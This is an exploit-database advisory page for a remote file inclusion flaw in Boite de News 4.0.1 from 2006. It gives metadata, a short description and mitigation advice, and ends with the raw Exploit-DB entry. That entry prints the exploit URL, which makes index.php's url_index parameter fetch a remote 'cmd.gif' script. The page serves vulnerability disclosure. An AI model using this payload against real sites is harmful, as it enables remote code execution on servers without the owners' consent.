header-logo
Suggest Exploit
vendor:
Boite de News
by:
the master
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Boite de News
Affected Version From: 4.0.1
Affected Version To: 4.0.1
Patch Exists: NO
Related CWE: N/A
CPE: 1801_boiteden-401.zip
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Boite de News v4.0.1 Remote File Inclusion Vulnerability

Boite de News v4.0.1 is vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. This URL can be used to execute arbitrary code on the vulnerable system.

Mitigation:

To mitigate this vulnerability, the application should validate user input and filter out malicious URLs.
Source

Exploit-DB raw data:

########################################################################
#  Boite de News v4.0.1  Remote File Inclusion Vulnerability
#
#  Download: ftp://ftp1.comscripts.com/PHP/1801_boiteden-401.zip
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/boitenews4/index.php?url_index=http://cmd.gif?
########################################################################

# milw0rm.com [2006-08-09]

Navigation

Suggest Exploit

Services By CQR